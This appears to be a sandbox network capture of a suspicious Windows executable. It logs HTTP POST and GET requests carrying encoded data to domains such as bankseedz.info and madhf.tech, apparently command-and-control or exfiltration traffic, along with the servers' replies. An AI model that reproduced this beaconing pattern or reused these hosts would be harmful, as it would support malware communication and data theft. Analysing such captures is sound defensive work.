Nov 24, 2024 08:29:40.530983925 CET	1809	OUT	POST /uf7y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.bankseedz.info Origin: http://www.bankseedz.info Referer: http://www.bankseedz.info/uf7y/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 59 47 76 55 6f 6e 64 71 72 7a 70 4e 6b 45 32 32 45 48 54 58 51 67 4a 41 6f 32 74 6a 2b 38 41 61 5a 57 72 75 6e 30 66 6b 38 55 77 69 59 70 4a 6a 65 53 49 4f 45 4a 58 47 51 55 69 35 6c 4e 4c 39 51 48 42 58 4b 62 32 48 47 33 6a 78 65 31 4e 79 5a 67 6c 64 6d 32 62 71 59 59 4a 6d 70 78 4d 35 31 51 6d 4b 54 69 36 35 35 42 4b 64 2b 47 38 65 4b 75 4f 55 61 49 38 6b 48 70 68 53 68 37 46 64 69 5a 59 6e 52 54 48 33 56 77 48 33 43 51 75 50 39 39 55 42 32 6b 54 77 33 52 78 56 4f 55 69 30 59 61 6c 65 34 44 6e 6d 46 67 58 70 44 55 35 4e 4d 57 59 47 6c 64 64 38 2f 69 5a 69 7a 36 79 7a 30 6c 4e 32 2f 50 66 76 79 69 56 6c 53 6f 4f 59 7a 42 77 70 67 4a 67 46 75 34 44 42 54 76 64 4e 45 4c 69 68 2b 52 59 66 35 70 4d 38 43 74 52 2b 46 30 2b 49 39 63 71 62 2f 56 44 56 71 66 66 56 41 77 41 41 57 65 55 55 47 75 56 79 57 69 68 49 4c 4d 74 30 53 30 7a 72 58 74 56 78 45 30 4b 66 73 62 42 [TRUNCATED] Data Ascii: ftMDw=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnYGvUondqrzpNkE22EHTXQgJAo2tj+8AaZWrun0fk8UwiYpJjeSIOEJXGQUi5lNL9QHBXKb2HG3jxe1NyZgldm2bqYYJmpxM51QmKTi655BKd+G8eKuOUaI8kHphSh7FdiZYnRTH3VwH3CQuP99UB2kTw3RxVOUi0Yale4DnmFgXpDU5NMWYGldd8/iZiz6yz0lN2/PfvyiVlSoOYzBwpgJgFu4DBTvdNELih+RYf5pM8CtR+F0+I9cqb/VDVqffVAwAAWeUUGuVyWihILMt0S0zrXtVxE0KfsbBZIZNnuFsIxL/2LGa5XeModVXKA4TwfoKxFiBml1vD6xk9glu5xeUvZoaqHPNCvsVUATBYd2+LEoTnHxquH4xeia7FRlCZhaABh+36mNJC70EUJqa2ZceAtQKb99M3tqJ5t6eSwD2rrmYQg/YuE0FMXCCRki19OUex2iINvF4tTf2j1O5U4aDnuXKPuBpssXsSp+8spB1UWwV61tJMyVeHwgGyCDLl4ZDIqsQOWzVeCo5NXSoDsTICVVUr0ZGaDL+2FueQsZCdLKcN3mYDobH920SYA4CZkcFqAMzSDWx3oW4s5DrNqnwHOD55OvS1dXB9M/sPnGFbfPhGAucM6DugtxzRCJe58H5LQrFegbbmXwpToDd+/FhcqEBQf69O60vysgKJtIPl/uWylhUJuakBcsp+WukCqn9j2pViLwLS3FacRDd1qi37ZS+1E4BwKORjqo2Q5ymbvZyAGoNq5MDMTwcCxroirU4wItRw0cmAYBk1/xPWHnKFO+BOVoB5PnUqsdD9boCSwQf2hv5xGkesLdAwrnMI6TdfQEOAA24GIRYbORSNXOrvKo2gKXEKYIU6ZV8Zc39ZzQSpo+otPdaxEcfVvhh74vwVGGa7kUZ34X+4+XgHKbkI8GYdQrHd7/Q+L2JCIwFRIbLRnRY5foaigqVDbwXxPm3dT [TRUNCATED]
Nov 24, 2024 08:29:41.861560106 CET	738	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Nov 2024 07:29:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49962	46.30.211.38	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:43.262352943 CET	517	OUT	GET /uf7y/?s8q=0RJLtN5PAfjxwlrp&ftMDw=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7uIxlsu2feUJ4Szk5xT5T+y3eU9uLCnOG2a5m16YfDmqw1YUm1PU= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.bankseedz.info User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:29:44.504693985 CET	738	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Nov 2024 07:29:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49987	103.224.182.242	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:52.439549923 CET	760	OUT	POST /3iym/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/3iym/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 6b 48 4a 30 70 72 50 61 4b 7a 76 66 53 66 4e 46 42 50 30 72 4a 66 34 7a 6c 79 58 69 37 6f 77 4d 68 4f 31 6b 38 53 2f 42 49 79 63 6b 68 69 4c 66 31 66 52 34 63 66 36 64 45 68 68 79 71 61 7a 70 39 35 6c 34 69 6d 34 2b 62 33 69 2b 5a 74 6e 47 53 61 66 51 7a 59 6d 67 69 32 61 47 4e 4d 2f 64 4d 35 7a 66 72 4e 62 42 79 75 31 65 6a 6b 69 78 34 69 4b 33 64 52 69 79 48 4e 51 6a 78 2b 51 53 51 68 41 43 74 6d 66 38 6b 47 75 74 54 5a 30 55 70 33 52 74 58 30 69 37 38 73 6f 43 30 48 44 73 73 35 7a 36 36 55 32 2f 56 64 6a 48 30 50 68 53 76 73 47 71 51 57 65 74 76 51 77 68 45 4f 57 Data Ascii: ftMDw=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RtX0i78soC0HDss5z66U2/VdjH0PhSvsGqQWetvQwhEOW
Nov 24, 2024 08:29:53.725788116 CET	871	IN	HTTP/1.1 200 OK date: Sun, 24 Nov 2024 07:29:53 GMT server: Apache set-cookie: __tad=1732433393.8125098; expires=Wed, 22-Nov-2034 07:29:53 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED] Data Ascii: TM0=7b=$qQHmHH hL&vVwiX\|I<~o8eK}W%eU6nKq$etPw$nN)enh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w\|!2Ye 6MgW gau,WC}!xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.\|x/hy@+e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49994	103.224.182.242	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:55.108361959 CET	784	OUT	POST /3iym/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/3iym/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 77 77 4d 44 57 31 6e 2b 71 2f 55 49 79 63 73 42 6a 44 62 31 65 64 34 63 54 63 64 41 39 68 79 71 2b 7a 70 39 4a 6c 34 31 79 35 6b 72 33 6b 32 35 74 6c 4c 79 61 66 51 7a 59 6d 67 6d 66 53 47 4e 30 2f 63 38 4a 7a 65 4b 4e 59 4a 53 75 32 64 6a 6b 69 6e 34 6a 42 33 64 52 63 79 46 70 36 6a 7a 32 51 53 53 70 41 43 2f 4f 59 32 6b 47 6f 77 44 59 4c 51 34 65 4e 68 48 77 6b 38 74 77 51 56 56 36 6e 67 36 6b 70 6d 4a 55 56 74 46 39 68 48 32 58 54 53 50 73 73 6f 51 75 65 2f 34 63 58 75 77 72 31 36 43 32 57 38 5a 42 79 63 70 75 66 64 39 2f 49 62 78 71 4e 58 41 3d 3d Data Ascii: ftMDw=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtF9hH2XTSPssoQue/4cXuwr16C2W8ZBycpufd9/IbxqNXA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50000	103.224.182.242	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:57.780669928 CET	1797	OUT	POST /3iym/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/3iym/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 34 77 50 77 65 31 6e 5a 47 2f 53 34 79 63 76 42 6a 41 62 31 66 48 34 63 37 59 64 48 31 78 79 6f 32 7a 6d 2b 78 6c 70 30 79 35 71 62 33 6b 30 35 74 6d 47 53 61 77 51 7a 4a 68 67 69 7a 53 47 4e 30 2f 63 2b 42 7a 4f 72 4e 59 45 79 75 31 65 6a 6b 6d 78 34 6a 70 33 64 59 6e 79 46 73 50 6a 41 4f 51 52 79 5a 41 42 4c 75 59 30 45 47 71 78 44 59 54 51 34 43 6b 68 48 39 62 38 74 55 36 56 57 6d 6e 6c 37 55 7a 31 4a 4a 4c 34 7a 56 33 62 78 53 35 4c 35 59 79 76 68 75 67 37 62 64 6e 6c 43 33 62 2b 31 53 57 36 4b 6b 4e 63 34 76 2f 53 4a 48 5a 5a 41 44 71 46 56 4b 51 49 36 56 36 42 52 67 6e 54 75 39 56 53 51 46 5a 4e 79 67 54 4f 79 46 42 44 4e 6c 68 33 4d 55 79 4b 68 6f 65 42 6b 42 5a 61 4e 2b 4d 4d 77 76 31 78 33 66 32 6a 64 76 2f 6e 6a 50 30 49 35 36 55 6d 76 68 70 55 6e 58 67 57 49 54 57 49 61 78 48 53 79 46 73 4d 30 51 31 6e 48 7a 4c 62 61 69 75 44 74 39 65 6a 37 4b 72 [TRUNCATED] Data Ascii: ftMDw=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2Hit4wPwe1nZG/S4ycvBjAb1fH4c7YdH1xyo2zm+xlp0y5qb3k05tmGSawQzJhgizSGN0/c+BzOrNYEyu1ejkmx4jp3dYnyFsPjAOQRyZABLuY0EGqxDYTQ4CkhH9b8tU6VWmnl7Uz1JJL4zV3bxS5L5Yyvhug7bdnlC3b+1SW6KkNc4v/SJHZZADqFVKQI6V6BRgnTu9VSQFZNygTOyFBDNlh3MUyKhoeBkBZaN+MMwv1x3f2jdv/njP0I56UmvhpUnXgWITWIaxHSyFsM0Q1nHzLbaiuDt9ej7Kr/5Y7Yuzm6id4VlcmTByQWzAnPNCta03ba7lKDuShHJWFJpgpJWR/9cqsDVw3cQEVSxnY/yjabzfdtAjayxIH0z7cQrS8A1O7SP4jtyv1qyYQ4rLVyk0axHDuDUd9USpsYabc2dCbVS96u2tTKt4Kn+Ljq28piBsuPyrXP4Dj50rd13PkfSi0Wl+GqJqwGuUsjLkWM/upWrkDiUKGeHkoBBH1qdgqnrhaFQmbjna3LK79z4D3KVcNM+4c5Pl2fPwV5ACYBuCzSpWe5YO9KYQjMX41trkXlJoy4+2gViKJISVodtq8tyRva1+S6DlB4nEStZXij3PaJ6oHIJ253BDv53VnNStL5dLGc46lZydO4JbH8eN+7K1oKvHf50BNqgTEmyZ8ECHxBkO8I8VsEIi/WmHxVDkzXcTQocjKy1oeyO4feSRnejvy6/JMGWOYBQL0t7MWlO9dTnPnySpmtm0cnboo8hx9jTcdv9yXTLQdnQFqbh++wVUWx/qJNjKYxdDtgDjAvM88oIShz9R5rbcPGqC7oG5m0Lsi+XEwzhNxMsyGwyz7Yta0PrdU5Oj8NmZS0ALL+F+RtPN0dMR3pfKxFT5FqdfetWevTcaF/ecJUy0kvuFPQCVCpK4+8KEpBoWkibtapW5AraHF1PEEjO4CkDVqWmClTXw4Fk [TRUNCATED]
Nov 24, 2024 08:29:59.182518959 CET	871	IN	HTTP/1.1 200 OK date: Sun, 24 Nov 2024 07:29:58 GMT server: Apache set-cookie: __tad=1732433398.3193406; expires=Wed, 22-Nov-2034 07:29:58 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED] Data Ascii: TM0=7b=$qQHmHH hL&vVwiX\|I<~o8eK}W%eU6nKq$etPw$nN)enh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w\|!2Ye 6MgW gau,WC}!xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.\|x/hy@+e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50003	103.224.182.242	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:30:00.447290897 CET	513	OUT	GET /3iym/?ftMDw=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLur5vg8ZgSRROrLy1+lGHKJKNnWrxIb45jIiCNbhxH2Mr3ltZMyC0=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.madhf.tech User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:30:02.028774023 CET	1236	IN	HTTP/1.1 200 OK date: Sun, 24 Nov 2024 07:30:01 GMT server: Apache set-cookie: __tad=1732433401.4134707; expires=Wed, 22-Nov-2034 07:30:01 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 1544 content-type: text/html; charset=UTF-8 connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 66 74 4d 44 77 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 62 30 76 6e 33 4c 4e 48 72 42 6e 57 61 4f 52 65 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 43 42 71 53 4b 65 54 52 4c 6b 2f 66 61 42 59 55 52 57 38 5a 65 46 74 2f 4a 6e 6e 58 4c 75 72 35 76 67 38 5a 67 53 52 52 4f 72 4c 79 31 2b 6c 47 48 4b 4a 4b 4e 6e 57 72 78 49 62 34 35 6a 49 69 43 4e 62 68 78 48 32 4d 72 33 6c 74 5a 4d 79 43 30 3d [TRUNCATED] Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?ftMDw=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLur5vg8ZgSRROrLy1+lGHKJKNnWrxIb45jIiCNbhxH2Mr3ltZMyC0=&s8q=0RJLtN5PAfjxwlrp&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body
Nov 24, 2024 08:30:02.028834105 CET	580	IN	Data Raw: 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 Data Ascii: bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/3iym/?ftMDw=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLur5vg8ZgSRROrLy1+lGHKJKNnWrxIb45jIiCNbhxH2Mr3ltZMyC0=&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50004	149.88.81.190	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
